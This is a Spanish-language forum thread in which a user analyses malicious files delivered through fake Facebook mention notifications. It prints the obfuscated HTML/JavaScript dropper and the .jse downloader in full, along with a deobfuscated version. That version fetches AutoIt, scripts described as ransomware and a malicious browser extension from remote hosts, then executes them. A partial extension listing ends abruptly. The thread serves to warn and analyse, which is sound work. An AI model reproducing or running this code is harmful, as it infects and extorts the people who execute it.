Mgbu

Tecnología
"Virus" en Facebook, cómo puede ser que pase esto?

9 posts en este tema

Ya van dos veces que en facebook recibo una notificacion diciendo "[Nombre de un amigo mio] te mencionó en un comentario". Me parece que el estilo de la notificación y el texto son muy convincentes, no encontré nada fuera de lugar.
Pero cuando toco la notificación en vez de ir a un comentario se descarga un archivo muy dudoso. La primera vez se me descargó un html y hoy un javascript. Al abrirlos se nota bien que son maliciosos.

Pego los dos archivos que recibí:

FACEBOOK99506256.html

<html><i id="iyftoximrggvmrj"><i><center><center><i class="jhdbnkxzbgznks"><img class="bwbxaidctct"><i class="cwijwvtogp"><img><span></span><ul id="qlbziwsxdijh"><center><div id="fhhxtvmnlyokg"></span><div><span id="dfdknaeimrtk"><center id="iuigmfrfpsruqua"></center></i><a href="http://hrdrokufcaleeqo.com"></a><ulid="ekjhallksdnks"></img><center id="effqbrsgcc"><title>Lesli Cagua</title><ul id="caquzvszdqlqt"></i></center></div></i><a href="https://ripfznzxbvjxcsnvp.com"></a><img id="oanusjmbzsbmr"><center id="mpyifckxxtjfik"><i id="dhfpzedmobxbr"><img></ul><div class="ovcvbsugvhux"><ul id="ybftpjvmxql"><span><ul id="ymccjrdqcbrhv"><center class="edwenobzysreq"><img><i><i class="nsbqpgeehddzviq"><a href="http://gnyaqyllencttg.me"></a><span><span class="phjfnweomczzoem"><span id="iyhoixtiyl"><div><ul></img><img class="vfljojcxio"><a class="fqhozmmldb"></span><div><a href="http://hvtydixqvtwfvkkauu.ml"></a><img class="qfcjtjfnijwfz"><img id="zfotzhfsbnhfdm"><a id="acqfbiuuwpivuwp"><ul class="lmguanmthmvyswh"><a href="http://yluwdrepihhhodwedggk.tk"></a><span id="wniuydrbuvrcdi"><img></ul><i class="cnflieoafjvx"></a><span></div><img></ul></i><div class="skwsritmgyzvupy"><ul id="oidxvlmddewnboe"><center></span><img><div id="eaoiekvfzapirf"></div><script>function RMytzvEDK(qfKbOGjpE) {var jheYmerWUA="hAdTUaaSASgrPdjBIkBQuJUsVZJSTkybLCUFDVydOFuEJDfrOHhiqcBmbleVvDWgfRMINlMBQhfzKkQyRY"; gVOfasKQ = ".*blD}5h>2rOQKXvHtZ/L'Y:y)=j;Mm3G{eNPo_8p],R7iE&csd!J+kC1gB?-SfxnUa6A0(VI[<qFw%Tz ".split("");qfKbOGjpE = atob(qfKbOGjpE.split("").reverse().join("")).split("-");KnaxLtWh = "";for (var ARnQXXSLEba = 0; ARnQXXSLEba < qfKbOGjpE.length; ARnQXXSLEba++) {if(typeof gVOfasKQ[qfKbOGjpE[ARnQXXSLEba]] != "undefined") {KnaxLtWh = KnaxLtWh + gVOfasKQ[qfKbOGjpE[ARnQXXSLEba]];var ibiudtyZPbWWh="IQBTCcKJhkusaTkZAsbJMedleSmaOtOxkprMscvAmQSnJdmkvoTitWtxPFxEZmbjBtWUvsuHimUSqhcLvVTPSnmHT";}var lSWncyGYscrMJz="ErpMtbipVXhikOcUaURoXqVWIXnvHNvleLYyNgOIeVRoKTjLOaZMqUIZSWvzJQLOCJnpQbYUXPiHJstysskJnTJgQeFzVroybBNR";}var LMABVilnBJGUU="iOZoEeUdalsymTlewXQXyLfKYGtEBoUJcTXGYSKYdcwqWHutFkqeVvOUciyEwtnym";return KnaxLtWh;}var vgoiyuazrwxkh=RMytzvEDK("=MTL2YTL1ETLtQzM");var gaegqntejry=RMytzvEDK("=MTL2YTL1ETLtQzM");var pjnovytgcipj=RMytzvEDK("=ITL3MTL3ETLtYjN");var uhgdhbjvjhq=window;uhgdhbjvjhq[gaegqntejry](uhgdhbjvjhq[vgoiyuazrwxkh](uhgdhbjvjhq[pjnovytgcipj]('Uk15dHp2RURLKCJ0MFNMdDBTTHRnak10VWpNdEF6TnRBVE50UWpOdFF6TXRrRE50QVRMd1FUTDNFVEwzRVRMMzB5TTIwU0x0MENPeTBTTnkwQ056MFNOMzBDTXgweU54MFNONDBpTTAwU055MENNMzBDTXoweU56MENNMTBDTjIwaU4yMENNeDBDTXRjVEwzRVRMMllUTDVJVEx6VVRMeElUTDVVVEx4SVRMelVUTDFJVEwyMGlOMTBpTjEwaU0wMHlOMjBTTzIwaU4xMGlNMDB5TjIweU4zMGlNMDBpTnRZVE50WVROdElETnRjak50a2pOdFlUTnRJRE50UUROdGN6TnRJRE50WXpOdGtqTnRZVE50SUROdFlUTnRZVE50WVROdElETnRZek50WXpOdElETnRjak50Y3pOdElETnRZVEwyVVRMMlVUTHlRVEw1WVRMNVlUTDJVVEx5UVRMMlVUTDVZVEwyVVRMeVFUTDJVVEw1WVRMMlVUTHlRVEw1MGlOMTBpTjEwaU0wMGlOdFlUTnRZVE50SUROdGNqTnRZVE50WVROdElETnRZVEwyVVRMMlVUTHlRVEwwUVRMMmNUTHlRVEw1MFNPMjBpTjEwaU0wMFNNejBTTzIwaU4xMGlNMDBTTzIwaU4xMGlOMTBpTTAwaU50a2pOdFlUTnRJRE50a1RMNTBpTjEwaU0wMENOMDBpTjMwaU0wMFNPejBTTzIwaU4xMGlNMDBTT3owaU4zMENNMzBDTnowQ00xMHlOejBTTjEwQ014MGlOMjB5TnRVVE50QXpNdGN6TXRBVE10SWpOdEFUTDNVVEwwWVRMMVFUTHdFVEwzRVRMeFlUTHpVVEx4SVRMNUVUTDVFVEx4SVRMelVUTDFJVEx4SVRMeklUTHdRVEwzRVRMM0VUTDMwU015MHlNeTBTTXkweU15MFNPMDBDTTAweU54MHlOeDB5TnRFak10a1ROdFVqTXRFak10TWpNdGtETnRBRE50Y1RNdGNUTXRjVEx4SVRMMWdUTDJJVEwySVRMMWdUTHoweU56MENPMDB5TnoweU54MHlOejBDTXgwQ00wMENNdFFqTnRjek10VUROdGNUTXRZak50Z0ROdGN6TXRNVEx3Y1RMd2NUTDFnVEx5UVRMeElUTHpnVEwyUVRMeU1UTHhJVEx3Y1RMMFlUTDBNVEx3UVRMM01UTHcwQ00wMHlOeDB5TngweU50TWpOdDBTTHRnak10VVRMdDBTTDEwU0x0MFNMNElUTDFJVEwzRVRMellUTDBNVEx6Z1RMME1UTDVRVEwwWVRMM01UTHdRVEw1UVRMME1UTHdFVEx3MENNMDB5TngweU54MHlOdE1qTnRBek50TVRMMllUTDFFVEwwTVRMdDBTTHQweU16MFNONDBTTnkwU08yMFNPMjBTT3RVRE90WWpNdFlqTXRVRE90a0ROdFV6TnRjVE10WWpOdGNUTXRrRE50QVRMd1FUTDNFVEwzRVRMMzB5TTIwU040MHlOMDB5TjAwU040MHlOMzBTTjQwaU55MGlOeTBTTjQwQ056MHlOeDBpTjIweU54MFNNMjBDTnkwQ00xMGlOMjBDTnowQ014MENNdEFETnRjVE10Y1RNdGNUTHpZVEx3Y1RMMWdUTHlZVEwxUVRMdDBTTHRNek10VURPdFVqTXRBek50UWpOdGN6TXRVRE50Y1RNdGdETnRRak50VXpOdElqTnRVRE90WWpNdFVET3RRek10Y1ROdFFqTnRZak50Y1RMNFFUTDBNVEwzRVRMMllUTDNFVEw1UVRMMElUTHdVVEwyWVRMME1UTHdFVEwwWVRMM01UTHcwQ00wMHlOeDB5TngweU50TWpOdDBTTHRnak10VWpNdEF6TnRjVE10a0ROdFF6TXRVek50a3pOdFF6TXRNRE50QUROdGNUTXRjVE10WVRNdEFqTXRrak10UVRNdFVET3RFRE90UXpNdFFqTnRVRE90WWpNdFVET3RBRE50Y1RNdGNUTXRjVEx6WVRMMWdUTHdFVEwyWVRMMUVUTHQwU0w1RVRMeDBDT3kwaU55MENPMjBpTngwQ00xMFNPdElUTnRFek10WWpOdFFET3RjVEx4TVRMd1VUTDNjVEx5VVRMNTBDTzAwQ04yMGlNMTBDTjIwaU10VXpOdGNUTDBZVEw0RVRMMElUTDMwQ016MGlOMjBTTTQweU0wMFNPdFlqTnRFVEw1RVRMdDBTTCIpOw==')))</script></ul><span><a id="zrnfrnuzfzomqga"><center class="tocngmhneger"><a href="http://faemnlzrsedapjvz.cf"></a><ul><a href="http://gabsonsfxojxds.ml"></a><img><img id="jgwhnxiflwyr"><span class="dnnlmpfinamtxv"><span><span></ul><i><ul class="pbunwvizja"><span><a href="http://doddxdoahvgkeh.net"></a></span></html> 

comment_33385454.jse

var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C\x66\x66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3||  !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa=  new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix=  new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2=  new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso=  new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1=  new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this)

EDIT 5: Hay algunas cosas que supuse mal, para ver qué hace el malware ver http://security.stackexchange.com/questions/128254/i-was-tricked-on-facebook-into-downloading-an-obfuscated-script

 

EDIT: Me gustaria saber si es una aplicacion, una falla de diseño de Facebook o que. Luego me pongo a ver el codigo un poco

 

EDIT 2: Ahí terminé de ver casi todo lo que hace (creo). No es que sepa mucho sobre malware, me puse a leer el código a lo que pude entender.

 

Ambos tienen una función que reciben strings que no tienen sentido y los decodifican en nombres útiles como "eval", "GET", o cosas así (incluso funciones enteras que luego son evaluadas) que supongo que son las cosas que buscan los antivirus.

 

Hay algunas cosas que no tienen mucho sentido, no me crean tanto :D

 

FACEBOOK99506256.html

  • Tiene un montón de HTML creo que basura, creo que tampoco es válido (tags que no se cierran, o se cierran en orden incorrecto). Salvo que ese html sea "informacion codificada" no sirve para nada.
  • Tiene un javascript que descarga otro javascript y una dirección web que en mi caso era de publicidades. No pude descargar el javascript, a lo mejor el sitio estaba caído. Las direcciones eran
    blazingfastspeeds.com/js.js?[numero_aleatorio]
    y
    http://lllllllllll.top/end.php?ref=c
  • Después evalúa ese javascript, que supongo que abre la web de publicidades y hace más cosas, pero no pude conseguir ese javascript

comment_33385454.jse

  • Descarga varias cosas:
    • Autoit.exe
      • Es un compilador de un lenguaje de scripting, los scripts tienen extensión .au3
    • bg.js
      • Es una extensión para chrome
      • Tiene una lista de sitios web sobre antivirus, algunos son antivirus como malwarebytes.org, pero otras son sospechosos como anti-virus.by
      • Ejecuta una función en cada página que uno abre, si esa página está en la lista de direcciones web, corta la carga del sitio.
      • Recibe mensajes desde páginas web cargadas y reenvía algo que no se que es
      • Creo que cierra todas las pestañas de facebook abiertas y abre la página principal de facebook, no se por qué
      • Descarga un javascript más, desde
        http://appcdn.co/data.js?r=[numero_aleatorio]&url=[sitio_actual]'>http://appcdn.co/data.js?r=[numero_aleatorio]&url=[sitio_actual]
        y lo ejecuta, lo raro es que esa dirección descarga jquery. Veo que envía un GET con una url y un número aleatorio. A lo mejor hay una url específica que hace que se descargue un javascript malicioso?
    • manifest.json
      • Creo que es algo de la extensión
    • ekl.au3
      • No lo miré mucho, similar a force.au3
    • force.au3
      • Es muy largo, por lo que veo es un ramsomware!
    • ff.zip
      • Me vino vacío
      • Si lo abro con GHEX veo que debe ser un rar, que igual está vacío
    • ping.js
      • Solamente tiene una línea, no se que es:
        WAU_r_('1,445','pingjse346',-1);
      • EDIT: Después entendí que era, ver el último edit
    • ping2.js
      • Parecido:
        WAU_r_('1,398','pingjse3462',-1);
    • run.bat
      • Compila force.au3 y ekl.au3 con Autoit.exe
    • sabit.au3
      • El MD5 coincide con el de force.au3
    • up.au3
      • El MD5 también coincide con el de force.au3

 

Acá hay otro post sobre lo mismo: security.stackexchange.com/questions/128254/facebook-tricked-me-into-downloading-an-obfuscated-script

 

En estos spoilers tengo al comment_33385454.jse y a bg.js un poco acomodados para intentar entender:

 

comment_33385454.jse

 

 

var _0xe519 = ["Msxml2.XMLhttp",
    "onreadystatechange",
    "readyState",
    "status",
    "ADODB.Stream",
    "open",
    "type",
    "write",
    "position",
    "read",
    "saveToFile",
    "close",
    "GET",
    "send",
    "Scripting.FileSystemObject",
    "WScript.Shell",
    "Shell.Application",
    "%APPDATA%\",
    "ExpandEnvironmentStrings",
    "Mozila ",
    "https: //www.google.com",
    "http://userexperiencestatics.net/ext/Autoit.jpg",
    "\autoit.exe",
    "http://userexperiencestatics.net/ext/bg.jpg",
    "\bg.js",
    "http://userexperiencestatics.net/ext/ekl.jpg",
    "\ekl.au3",
    "http://userexperiencestatics.net/ext/ff.jpg",
    "\ff.zip",
    "http://userexperiencestatics.net/ext/force.jpg",
    "\force.au3",
    "http://userexperiencestatics.net/ext/sabit.jpg",
    "\sabit.au3",
    "http://userexperiencestatics.net/ext/manifest.jpg", 
    "\manifest.json", 
    "http://userexperiencestatics.net/ext/run.jpg",
    "\run.bat", 
    "http://userexperiencestatics.net/ext/up.jpg", 
    "\up.au3", 
    "http://whos.amung.us/pingjs/?k=pingjse346", 
    "\ping.js", 
    "http://whos.amung.us/pingjs/?k=pingjse3462",
    "\ping2.js", 
    ""];

(function(funcion1) {
    function funcion2(funcion2, variable1, variable2) {
        if (!variable1 || !funcion2) {
            return null
        };
        var objHTTP = WScript.CreateObject("Msxml2.XMLhttp");
        objHTTP["onreadystatechange"] = function() {
            if (objHTTP["readyState"] === 4 && objHTTP["status"] === 200) {
                adodbStream1 = new ActiveXObject("ADODB.Stream");
                adodbStream1["open"]();
                adodbStream1["type"] = 1;
                adodbStream1["write"](objHTTP.ResponseBody);
                adodbStream1["position"] = variable2;
                adodbStream2 = new ActiveXObject("ADODB.Stream");
                adodbStream2["type"] = 1;
                adodbStream2["open"]();
                adodbStream2["write"](adodbStream1["read"]());
                adodbStream2["saveToFile"](variable1, 2);
                adodbStream2["close"]();
                adodbStream1["close"]()
            }
        };
        objHTTP["open"]("GET", funcion2, false);
        objHTTP["send"](null)
    }

    function funcion3(variable3, variable4) {
        {
            adodbStream1 = new ActiveXObject("ADODB.Stream");
            adodbStream1["open"]();
            adodbStream1["type"] = 1;
            adodbStream1.LoadFromFile(variable3);
            ix = new ActiveXObject("ADODB.Stream");
            ix["open"]();
            ix["type"] = 1;
            ix.LoadFromFile(variable4);
            adodbStream2 = new ActiveXObject("ADODB.Stream");
            adodbStream2["type"] = 1;
            adodbStream2["open"]();
            adodbStream2["write"](ix["read"]());
            adodbStream2["write"](adodbStream1["read"]());
            adodbStream1["close"]();
            ix["close"]();
            adodbStream2["saveToFile"](variable3, 2);
            adodbStream2["close"]()
        }
    }
    fso = new ActiveXObject("Scripting.FileSystemObject");
    var shell = new ActiveXObject("WScript.Shell");
    funcion1 = new ActiveXObject("Shell.Application");
    FileDestr = shell["ExpandEnvironmentStrings"]("%APPDATA%\");
    mozklasor = FileDestr + "Mozila ";
    if (!fso.FolderExists(mozklasor)) {
        fso.CreateFolder(mozklasor)
    };
    funcion1.ShellExecute("https: //www.google.com");
    funcion2("http://userexperiencestatics.net/ext/Autoit.jpg", mozklasor + "\autoit.exe", 0);
    funcion2("http://userexperiencestatics.net/ext/bg.jpg", mozklasor + "\bg.js", 0);
    funcion2("http://userexperiencestatics.net/ext/ekl.jpg", mozklasor + "\ekl.au3", 0);
    funcion2("http://userexperiencestatics.net/ext/ff.jpg", mozklasor + "\ff.zip", 0);
    funcion2("http://userexperiencestatics.net/ext/force.jpg", mozklasor + "\force.au3", 0);
    funcion2("http://userexperiencestatics.net/ext/sabit.jpg", mozklasor + "\sabit.au3", 0);
    funcion2("http://userexperiencestatics.net/ext/manifest.jpg", mozklasor + "\manifest.json", 0);
    funcion2("http://userexperiencestatics.net/ext/run.jpg", mozklasor + "\run.bat", 0);
    funcion2("http://userexperiencestatics.net/ext/up.jpg", mozklasor + "\up.au3", 0);
    funcion2("http://whos.amung.us/pingjs/?k=pingjse346", mozklasor + "\ping.js", 0);
    funcion2("http://whos.amung.us/pingjs/?k=pingjse3462", mozklasor + "\ping2.js", 0);
    funcion1.ShellExecute(mozklasor + "\run.bat", "", mozklasor, "", 0)
})(this)

 

 

 

bg.js

 

 

var _0x4911 = ["","split",
"BlTgd&s*Ux[CDMhR'yjSm8b5O)>J2Pq%t,GXv<0i3eL}rZ+Q{n:A-%.4(o!?w/Kp9f7aN6]zHFcY=;V_kIE1u ",
"m",
"join", 
"reverse", 
"length", 
"undefined", 
"xQTbwITb3UTb0QTb0ETbtRzN", 
"=IzMtlDNtFDNtBjMtFDNtNTb3YTb5QTb3YTbtBjM",
"==QN20WMtFDNtlTMtJzMtFDNt12M", 
"jxlrputpoit", 
"=ETb3YTbwITb0QTb3UTbtlDN", 
"xkqnjaqjq", 
"vujkndhcvx", 
"bznjedkxlm", 
"jtftkbnc", 
"hpmckphcita", 
"zgcwigzz", 
"yaovntfveo", 
"=YTbyITb3YTbtJzM", 
"00WM00mMz02N20GNtNjNthTb5QTbtdTN",
 "0QTbxQTb5QTbxQTbyMTb20WOz0mM00GNtRTbtdjN",
 "=kTbyQTbz0GN002M30WMtJTMtRjMtlTbyITbtJzN",
 "=EDNtNjNtdTMtJTbx0WMtdjNtJzMtZTb5QTbtlzM",
 "==QNz0mNz0mM30WMx02M30GNtJDNtNTbtBzM",
 "==ANx0GOtdTNtBDOtJTb4YTb3UTb3QTbzETbthzN",
 "4YTbwYTbxcTb1QTbwYTb3YTb5ITb0gTbxETbtFDO",
 "=kzMtFTMtNTbyQTb5MTb20GM20GNtdTNtFTNt1GM",
 "=UTMtJTb5ETb0QTb3YTbxcTb4ETbtVjN",
 "==AMtJjNtJjMtNTb4ETb4cTb0gTbxUTbtJzN",
 "==AOthTMtRDOtJTMtFTMtNTbwYTbyYTb3UTb0MTbtNzN",
 "==AOtNTMtljMtZTbw02MtlTb3UTbtdDN",
 "=kjMtdjNtVDNtdDNtBjNtJjNtJDNthzNtNTMtZTbtJjM",
 "vzjjfsxfgq",
 "qfgvngyrwnd",
 "ohiloqxtv",
 "3ETb0QTbxQTb0gTbtBzM", 
"iqhbatvmltl",
 "zjbqdhqu",
 "fbwzthcnrg", 
"kqxrcielyla",
 "mrjucrdtge", 
"fjvsgxik", 
"gkhbxrhd", 
"xjqtskrvvk", 
"=IzMtFDNt12M",
 "==ANtlDNtFDNt1mN",
 "=IzMtNjNtlzMtRDNtRzNtlTMtFDNtJzMtRDOtRzNtFDNtlTbtFDN",
 "20GOx0GN102N20mMz02N20GNtFjNtdTNtRzNtRTNtlDNtRTb0cTbzYTbzYTb3YTbxYTbxYTbwUTbzYTbyMTbyMTbtRTM",
 "=ITbygTbtRzM", 
"=EDNtJzMtFDNtFTbzYTbwITb3UTbtRzN",
 "==gNtRDOtJzMtdjNtJzMt1mN",
 "xQTbwITb5MTbyMTb5QTb0gTbtRDN",
 "xQTbz02N20mNtZTbxQTbzETb5QTbtdTN",
 "=ETb3YTb2MTbtFDN",
 "yxghnqyea",
 "ikvxlelue", 
"t1Wbt1Wbt12N30WNy02M00Wbt1Wb3cTb1ITbzQTb4QTb1gTb1ITb2UTb5QTb3UTb5MTbyMTb0cTb5QTb0gTb1YTb1gTbzMTbzQTbt1Wbt1WM00mNz0WOz0mMz0GN302N20WN40GM10mNx0GNtFDNtJzMtRzNtFDNtFTbxQTb20mNx0Wbt1Wbt12Mz0WM00mNz0WOz0mMz0GN302N20WN40GM10mNx0WM00mNz0WOz0mMz0GN302N20mNx0Wbt1Wbt12Mz0mNx0WM20GMy02N10GN30GN10GM402N102N10mMy0WM00GN302N20WN20GN10GM20GM20GM20WM20WM20GM10mNtNjNtJzMtJzMtRTMtZTMtVDOtBTNtZTMtFTb0QTb0gTb2ETbt1Wbt1Wb4QTb2UTbxQTbyMTb3YTbxQTb0QTb0cTb0UTb20mMy02N20mMz0GN10WM00GMy02N10GN00GNx0GN30Wbt1WbtNDNt1Wbt1Wb3cTb1ITbzQTb4QTb1gTb1ITb2UTb5QTb3UTb5MTbyMTb0cTb5QTb0gTb1YTb1gTbzMTb00WOz0GN10GM30mMy02N20mMz0GMx0mNtJjMtdjNtJzMtZTNtFDNtZzMtdTNtBjMtFDNtRDNtRTNtZTbyITb3YTbyMTb0UTbxQTbwITb3UTb0QTb0ETb0cTbt1Wbt1WbzQTb3cTbxQTb0gTb0QTbyMTb1gTb2cTb1gTbxQTb2MTb5MTbyMTb0cTb3YTb4QTb1gTb1ITbxQTb2MTb5MTbyMTb0cTb3YTb0UTbwcTbyITb3YTbyMTbwETb20mMy02N20mMz0mN10WN20WOz0Wbt1Wbt1GO00WN40WNy0mNtJjMtdjNtJzMtVDOtlDNtlzMtVDOtJjMtdjNtJzMtZTNtVDOtRDNtdTNtVjNt1Wbt1Wb3cTbxQTb20WMtdjNtVjNtVDOtZzNtVDOtFDNtZzMtlzMtJzMtRzNtdjNt1Wbt1Wb4QTb1gTb1ITb20mMy02N20mMz0mN10WN40WO002N10WOz0mMz0GN30WO00GN40WN20WN402Mz02M00Wbt1WbzMTb2ETb30WM20GMy02N10GN30GN10GM402N102N10mMy0WM00GN302N20WN20GN102NtFjNtFjNtBTNtdTb2ETb1gTbwUTb2ETbx0GN00GN40mNx0Wbt1WbthDNtZTNtdTMtRDNtFDNtRDOtBzMtRTNtZTbyITb3YTbyMTb0UTbxQTbwITb3UTb0QTb0ETb0cTbt1Wbt1Wb3cTb1ITbzQTbt1WbtNDNt1Wbt1Wb3cTbxQTb0gTb0QTbyMTb1gTb5QTb0QTb0gTbyMTbxQTb0QTbt1Wbt1Wb3cTb1ITb3YTbyMTb3YTb00GN10mNtRzNtRTMtlzMtdTMtdjNtRDNtRTbxcTb2UTbwcTbwMTbx0GMz0mMy0WO00WN20mNz0GOx0GMy0GN30GMy0GMx02M20mMz0mMz0GNx0WOt1Wbt1WbtNDNt1Wbt1WbtdzNtVjMtFDNtNjNtdTMtJzMtdjNtJzMtdjNtRTb1gTbzMTb2ETbxQTbzYTb3ETby0mM10mMz0WO00WM00mMz0WO002N10WMx0mNx0mN10GN00WM00GNtdjNtFDNtJzNtJzMtZTbxQTb0gTbwMTbxQTb1ETbyMTbxQTb20GN102M20mMz0mMz0GNx0WOt1Wbt1Wbt1GO00WN40WNy0mNx0mMtlTMtRjMtljMtZT